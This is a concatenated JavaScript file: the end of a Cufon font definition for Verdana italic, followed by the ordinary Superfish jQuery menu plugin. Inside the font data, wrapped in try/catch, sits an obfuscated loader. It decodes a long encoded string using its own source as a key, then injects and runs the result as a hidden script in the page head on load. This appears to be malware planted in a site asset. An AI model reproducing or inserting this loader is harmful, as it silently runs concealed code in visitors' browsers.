4,101v-4,101,-70,165,-184,161r-71,0r31,-131r-33,0r6,-24r32,0xm54,-29v109,9,176,-33,176,-129v0,-67,-56,-79,-129,-75r-18,78r63,0r-5,24r-63,0","w":275},{"d":"61,-85v-7,29,-8,63,29,60v22,-2,46,-14,61,-25r34,-146r33,0r-45,196r-33,0r5,-22v-39,42,-141,38,-121,-47r30,-127r33,0"},{"d":"204,-98v30,-2,34,-29,36,-65r29,0v-3,48,-14,92,-64,93v-58,2,-53,-56,-100,-65v-28,4,-33,29,-35,66r-30,0v2,-49,16,-92,64,-94v56,-2,55,55,100,65","w":294},{"d":"42,-50v0,47,80,20,99,2r13,-56v-51,6,-112,2,-112,54xm144,-200v38,2,58,27,49,67r-31,133r-32,0r4,-21v-27,29,-130,45,-127,-23v3,-76,76,-81,152,-86v10,-30,-10,-43,-42,-43v-21,0,-50,10,-67,14r6,-33v12,-2,29,-7,44,-8v-18,-7,-30,-23,-32,-46v-5,-68,125,-101,125,-20v0,32,-23,58,-49,66xm124,-219v21,1,43,-22,43,-43v0,-16,-13,-32,-30,-30v-42,-5,-63,71,-13,73","w":216},{"d":"155,-224v0,49,-29,120,47,110r-6,26v-59,-4,-78,37,-86,89v-8,51,-49,74,-113,68r5,-23v101,18,56,-104,126,-134v7,-6,21,-4,23,-15v-22,-9,-39,-24,-39,-51v0,-31,33,-103,-26,-96r-20,0r5,-24v47,-3,84,7,84,50","w":228},{"d":"15,-63v0,-94,76,-169,165,-125r19,-86r33,0r-63,274r-33,0r5,-21v-42,41,-126,35,-126,-42xm50,-69v-4,60,69,48,97,21r26,-113v-14,-7,-27,-12,-47,-12v-54,0,-72,50,-76,104xm318,-274r-65,89r-22,0r47,-89r40,0","w":233},{"d":"257,-262r-125,147r-27,115r-35,0r26,-111r-59,-151r38,0r45,118r99,-118r38,0xm211,-361r-63,66r-27,0r44,-66r46,0","w":221},{"d":"89,-196r-46,196r-33,0r45,-196r34,0xm126,-228r-25,0r-15,-47r-36,47r-26,0r46,-67r40,0","w":98},{"d":"118,-24v30,-1,49,-16,69,-24r-8,35v-18,6,-43,14,-67,14r-15,62r-20,0r14,-63v-81,1,-78,-117,-34,-159v19,-19,48,-34,80,-38r14,-62r21,0r-14,61v22,1,42,9,57,16v-4,10,-3,25,-10,32v-15,-13,-28,-21,-53,-23xm131,-173v-55,5,-89,79,-62,133v7,8,16,13,28,15","w":228},{"d":"171,-256v13,-1,20,-14,22,-29r22,0v-8,30,-19,52,-51,54v-27,2,-30,-28,-52,-28v-14,0,-19,14,-22,29r-22,0v6,-30,23,-52,51,-54v26,-1,30,25,52,28xm83,-175v40,-43,141,-36,121,48r-30,127r-33,0r30,-142v-1,-53,-74,-23,-94,-5r-34,147r-33,0r45,-196r33,0"},{"d":"146,-21v-20,26,-80,36,-97,1r-22,92r-33,0r62,-268r33,0r-34,147v17,32,79,24,98,-1r34,-146r33,0r-45,196r-32,0","w":230},{"d":"190,0r-40,0r-63,-86r-28,23r-15,63r-33,0r45,-196r34,0r-23,98r115,-98r44,0r-112,92","w":211},{"d":"205,-83v0,57,-46,87,-107,89v-45,1,-82,-23,-82,-65v0,-44,31,-66,63,-82v-74,-42,-6,-127,68,-127v41,0,74,20,75,56v0,37,-28,60,-56,74v22,11,39,25,39,55xm146,-147v25,-15,41,-29,41,-60v0,-22,-20,-36,-45,-36v-48,0,-83,57,-36,79v10,5,27,12,40,17xm101,-19v59,3,94,-73,39,-97v-15,-7,-21,-8,-41,-16v-50,13,-69,109,2,113","w":228},{"d":"129,-202v46,0,75,28,74,75v-2,75,-37,130,-113,132v-46,1,-75,-28,-74,-75v3,-75,40,-132,113,-132xm95,-22v52,-3,72,-47,74,-102v0,-31,-15,-51,-45,-50v-52,2,-72,48,-74,102v0,30,16,51,45,50xm188,-229r-35,0r8,-34r35,0xm115,-229r-35,0r8,-34r35,0","w":218},{"d":"241,0r-36,0r9,-39r36,0xm143,0r-36,0r9,-39r36,0xm44,0r-35,0r9,-39r36,0","w":294},{"d":"107,-274r-64,274r-33,0r63,-274r34,0xm191,-274r-65,89r-22,0r47,-89r40,0","w":106},{"d":"76,-259v45,-12,129,-19,114,49r-25,113r-30,0r4,-17v-26,26,-106,34,-104,-21v3,-63,61,-69,125,-72v6,-24,-6,-34,-34,-34v-18,0,-44,8,-56,11xm66,-142v0,37,64,17,79,3r10,-45v-38,4,-89,2,-89,42","w":196},{"d":"71,43v31,14,78,3,72,-39v-71,6,-120,-30,-120,-98v0,-133,126,-212,243,-149r-8,39r-3,0v-18,-20,-44,-34,-82,-34v-75,0,-110,60,-112,137v-1,49,25,77,73,77v44,0,70,-22,98,-36r-9,40v-15,7,-36,16,-53,20v1,56,-48,87,-104,69","w":251},{"d":"89,-196r-46,196r-33,0r45,-196r34,0xm131,-263r-8,34r-33,0r8,-34r33,0xm67,-263r-8,34r-33,0r8,-34r33,0","w":98}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-1540-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("2;v&[n`b3LWa2+-QEn7_K;KWGd`&vnWaGdI_3Lh]v=$Tyzb^GXi}0ME-GXi}0MydGXi}0;IgGXi}0MI!GXi}0;h^h-{&0,Uzl={&0,Ub`7{&0,U&v7{&0,U}`7{&0,9n0&{&0,9sv-{&0,U}vXItEMA{0M7tEMA{`M7tEMA{`,=BGXi}0MiFGXi}0MU~GXi}0;i}GXi}0MikGXi}0MKkGXi}0;=!GXi}0;ikGXi}0M`!GXi}0;KkGXi}0MA~GXi}0;=^GXi}0MozGXi}0;iFGXi}0;0FGXi}0M7!GXi}0Mo}GXi}0MhnGXi}0MidGXi}0M`^GXi}0LK}GXi}0;odGXi}0Mt}GXi}0M=!GXi}0M=nGXi}0;0&GXi}0MtFGXi}0M`nGXi}0M7^M7{&0,7ny8etEMA{0gvtEMA}v,A1GXi}0Mh-GA9+,U7;XKI2#0`lBoh8Mi=LGyv3[tErp1!^gs-n]VmHZTeaj}{_zb&dkF~*Q$Wx6Xi}0MKzGXi}0My_`&{&0,9n`={&0,Ukv7{&0,U&y&{&0gA{l={&0,Ub`&{&0,9nv-{&0,Uk`={&0,9sy={&0,7nvX7tEMA{`g7tEMA}vg9tEMA{`,ItEMA}vM`tEMA}yM-tEMA{`n`tEMA{yLvtEMA{0L=tEMA{`,7tEMA{`zhtEMA{yM7tEMA{`L=tEMA}ygvtEMA}v;`tEMA{0,`tEMA}v,EtEMA}v;=tEMA{0,!tEMA{`z-tEMA{0;`tEMA{0;=tEMA}yz-tEMA}ydItEMA}vM7tEMA{`z`tEMA{0,9tEMA}v,htEMA}vMvtEMA}yn=tEMA{0ghtEMA{`g=tEMA_0M!tEMA{`M`tEMA}yLhtEMA{`nItEMA{0gKmGXi}0MA&GXi}0MyFGXi}0;`nGXi}0Mo~o-{&0,9^0&{&0,Uz0={&0gA{`7{&0,U}`&{&0,9nl7{&0,Uz07{&0,Udl={&0,Ubv7{&0,U_0=}jGXi}0MIgGXi}0;vsGXi}0MybGXi}0;IsGXi}0MK}GXi}0MhgGXi}0ME^GXi}0M0zGXi}0M=^GXi}0;U}GXi}0;`-L={&0,U{l7{&0,9gy&{&0,9!`7{&0,U{`d$T=7{&0,Ub`-{&0,9gvX9tEMA{0M=tEMA{0MvtEMA_0L7tEMK}0LhtEMA{0,II=={&0,7nv-{&0,K{yg`tEMA{0L`!GXi}0Mi&GXi}0MyzGXi}0;=gGXi}0M7s=-{&0,U_v={&0,9-l=etEMA{`MhtEMA}yM!tEMA{0LvtEMA{`dvtEMA{`;7]GXi}0MIs8&{&0,Uk`z7tEMA{`nUWGXi}0M0bGXi}0;7nGXi_0;7gGXi}0MUzM8&2G={&0,U_vg9tEMA{0,vtEMA{`MItEMA{vnIMGXi}0zE-GXi}0;`!L-7UGXi}0MtdL,vKy7{&0,U}0={&0,9!`&{&0,U}yiEHGXi}0;KFG]m^G7{tEMA{`MAnGXi}0MI^GXi}0Myk=&W9GXi}0My}GXi_0,UFGXi}0;o_GXi}0MK&GXi}0M!n#-{&0,9^`+7tEMA}vMhtEMA}yzItEMA{0zItEMA}yL0]0n=,Bd-tEMA{0MIg[7{&0,9s`MhtEMA}vgsVGXi}0;0bl^hVGXi}0;o{K&{&0,Uby-{&0,UdvnhtEMK{0gItEMA{0g!tEMA}yzAxGXi}0M`gh={&0,7nv={&0,Uk0s9tEMA}yz`tEMA}yn7tEMA{0g-tEMA}yMU-GXi}0ME!l&{&0,UdvXEtEMA}yg7tEMA{lMItEMA{0zEo2n&tEMA}yM`tEMA}ynItEMA}v,1$GXi}0;7^GXi}0MEgGXi}0M0dGXi}0;vgGXi}0M`sGXi}0;v!GXi_0,7gGXi}0;K~GXi}0;v-GXi}0;0{M-{&0,K{l={&vnv-`={&0,7ny&{&0,9-v7{&0,9!`={&0,9n`&{&0,UdvM-tEMA}yzvtEMA}v,`tEMA}vnItEMA{yM9ZGXi}0Mi~E-{&0,9!v={&0,9^v-{&0,9sl={&0gA{0&{&0,9n0-{&0,U{`7ItEMA{0z=tEMA}vMI~`={&0,Ubl7{&0,9!`]etEMA}ygItEMA{0;ItK]`tEMA}yg9tEMA{`z7tEMA}vgharXhnp7{&0,U{0X=xGXi}0;i&p={&0,U}v-{&0,9sv7{&0,9-v={&0,9!0-{&0,9n0={&0,9^`={&0,Uzl,!tEMA}vgvtEMK}0gvtEMA{0d=tEMA}yL7tEMA}yzEtEMA}vLy^#]`}[;-b2+K^28{mBMATt,&^#]AT[,&}#n{-[nEb3+{]BLKav^~][X-}3X0WrkbQ3LyVy^~j3zbjG^16l]EkE&}a2M$VBzVa2&}a[nh}yd{mvL~bG+~g[d&$#^et#n`^[=}a[kI]p+FZG+~gyn&&3&}a[kI]G+~&3_ss#dsaE;=zE+!T[d`!E;-j[^~V[k`b[n7ev8smvnW_2,emB;}Q2_em2LE[y&emG=bWt7emGGbm2+s1")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":227,"face":{"font-family":"Verdana","font-weight":400,"font-style":"italic","font-stretch":"normal","units-per-em":"360","panose-1":"2 11 6 4 3 5 4 11 2 4","ascent":"288","descent":"-72","x-height":"5","bbox":"-47 -361 403 74.7929","underline-thickness":"21.0938","underline-position":"-21.0938","slope":"-13","unicode-range":"U+0020-U+2122"}}));
;
// $Id: superfish.js,v 1.2 2008/08/31 21:35:34 jmburnz Exp $
/*
 * Superfish v1.4.8 - jQuery menu widget
 * Copyright (c) 2008 Joel Birch
 *
 * Dual licensed under the MIT and GPL licenses:
 * 	http://www.opensource.org/licenses/mit-license.php
 * 	http://www.gnu.org/licenses/gpl.html
 *
 * CHANGELOG: http://users.tpg.com.au/j_birch/plugins/superfish/changelog.txt
 */

;(function($){
	$.fn.superfish = function(op){

		var sf = $.fn.superfish,
			c = sf.c,
			$arrow = $(['<span class="',c.arrowClass,'"> &#187;</span>'].join('')),
			over = function(){
				var $$ = $(this), menu = getMenu($$);
				clearTimeout(menu.sfTimer);
				$$.showSuperfishUl().siblings().hideSuperfishUl();
			},
			out = function(){
				var $$ = $(this), menu = getMenu($$), o = sf.op;
				clearTimeout(menu.sfTimer);
				menu.sfTimer=setTimeout(function(){
					o.retainPath=($.inArray($$[0],o.$path)>-1);
					$$.hideSuperfishUl();
					if (o.$path.length && $$.parents(['li.',o.hoverClass].join('')).length<1){over.call(o.$path);}
				},o.delay);	
			},
			getMenu = function($menu){
				var menu = $menu.parents(['ul.',c.menuClass,':first'].join(''))[0];
				sf.op = sf.o[menu.serial];
				return menu;
			},
			addArrow = function($a){ $a.addClass(c.anchorClass).append($arrow.clone()); };
			
		return this.each(function() {
			var s = this.serial = sf.o.length;
			var o = $.extend({},sf.defaults,op);
			o.$path = $('li.'+o.pathClass,this).slice(0,o.pathLevels).each(function(){
				$(this).addClass([o.hoverClass,c.bcClass].join(' '))
					.filter('li:has(ul)').removeClass(o.pathClass);
			});
			sf.o[s] = sf.op = o;
			
			$('li:has(ul)',this)[($.fn.hoverIntent && !o.disableHI) ? 'hoverIntent' : 'hover'](over,out).each(function() {
				if (o.autoArrows) addArrow( $('>a:first-child',this) );
			})
			.not('.'+c.bcClass)
				.hideSuperfishUl();
			
			var $a = $('a',this);
			$a.each(function(i){
				var $li = $a.eq(i).parents('li');
				$a.eq(i).focus(function(){over.call($li);}).blur(function(){out.call($li);});
			});
			o.onInit.call(this);
			
		}).each(function() {
			menuClasses = [c.menuClass];
			if (sf.op.dropShadows  && !($.browser.msie && $.browser.version < 7)) menuClasses.push(c.shadowClass);
			$(this).addClass(menuClasses.join(' '));
		});
	};

	var sf = $.fn.superfish;
	sf.o = [];
	sf.op = {};
	sf.IE7fix = function(){
		var o = sf.op;
		if ($.browser.msie && $.browser.version > 6 && o.dropShadows && o.animation.opacity!=undefined)
			this.toggleClass(sf.c.shadowClass+'-off');
		};
	sf.c = {
		bcClass     : 'sf-breadcrumb',
		menuClass   : 'sf-js-enabled',
		anchorClass : 'sf-with-ul',
		arrowClass  : 'sf-sub-indicator',
		shadowClass : 'sf-shadow'
	};
	sf.defaults = {
		hoverClass	: 'sfHover',
		pathClass	: 'overideThisToUse',
		pathLevels	: 1,
		delay		: 700,
		animation	: {opacity:'show'},
		speed		: 'slow', 
		autoArrows	: true,
		dropShadows : false,
		disableHI	: true,		// true disables hoverIntent detection
		onInit		: function(){}, // callback functions
		onBeforeShow: function(){},
		onShow		: function(){},
		onHide		: function(){}
	};
	$.fn.extend({
		hideSuperfishUl : function(){
			var o = sf.op,
				not = (o.retainPath===true) ? o.$path : '';
			o.retainPath = false;
			var $ul = $(['li.',o.hoverClass].join(''),this).add(this).not(not).removeClass(o.hoverClass)
					.find('>ul').hide().css('visibility','hidden');
			o.onHide.call($ul);
			return this;
		},
		showSuperfishUl : function(){
			var o = sf.op,
				sh = sf.c.shadowClass+'-off',
				$ul = this.addClass(o.hoverClass)
					.find('>ul:hidden').css('visibility','visible');
			sf.IE7fix.call($ul);
			o.onBeforeShow.call($ul);
			$ul.animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); });
			return this;
		}
	});

})(jQuery);
;

